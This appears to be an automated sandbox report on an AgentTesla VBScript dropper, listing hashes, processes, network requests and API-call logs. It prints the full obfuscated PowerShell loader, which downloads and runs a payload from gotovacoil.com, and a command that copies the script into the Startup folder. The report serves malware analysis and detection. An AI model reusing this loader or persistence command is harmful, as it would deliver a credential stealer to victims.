Summary | ZeroBOX

Protected%20Client.vbs

AgentTesla info stealer Generic Malware browser Google Downloader Chrome User Data Antivirus Malicious Library Malicious Packer Code injection Escalate priviledges Socket ScreenShot Create Service KeyLogger Sniff Audio DNS Hide_URL
Category Machine Started Completed
FILE s1_win7_x6401 May 20, 2022, 5:30 p.m. May 20, 2022, 5:41 p.m.
Size 2.1KB
Type ASCII text, with CRLF line terminators
MD5 55229dd65a8d4ee3d454fe9d2da3b194
SHA256 ea72201040a1802f8c3d65d656a257b21495d474390d921eace73eb29c2173a6
CRC32 A788B7F3
ssdeep 48:yeTUNRPYT3SYqrn3ZbeXkn6NRv4UVJBl40hUuTm0/J1GwJL:y5N5YTiJrn3Zbf1UVJBo0/J1tL
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs

    2840
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01100011,01101110,01100001,01101101,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P

      2156
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs'

      2236

IP Address Status Action
164.124.101.2 Active Moloch
216.58.220.110 Active Moloch
23.105.131.193 Active Moloch
72.48.234.249 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3
192.168.56.101:49173
23.105.131.193:551
None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00300ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003016e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003016e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003016e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003016e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003016e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003016e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00300b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00300b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00300b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003013e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00301868
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003017a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065e5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065edf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065edf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://gotovacoil.com/cname/Encrypted%20Client%20OG.jpg
request GET http://gotovacoil.com/cname/attack.txt
request GET http://gotovacoil.com/favicon.ico
request GET http://gotovacoil.com/cname/Encrypted%20Client%20OG.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2840
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02630000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02630000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72f21000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72f22000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02702000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02631000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02703000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02704000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02777000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02762000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02775000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02705000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02706000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02763000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02764000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02765000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02766000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02767000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02768000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02769000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b72000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b73000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b74000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b75000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b77000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b78000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b79000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b7c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b7d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b7e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b7f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\bb17803d-4384-4bab-809b-c199792eadf6\AgileDotNetRT.dll
file C:\Users\test22\AppData\Local\Temp\97c2e543-1829-4fd6-91a1-35d2e827242f\AgileDotNetRT.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
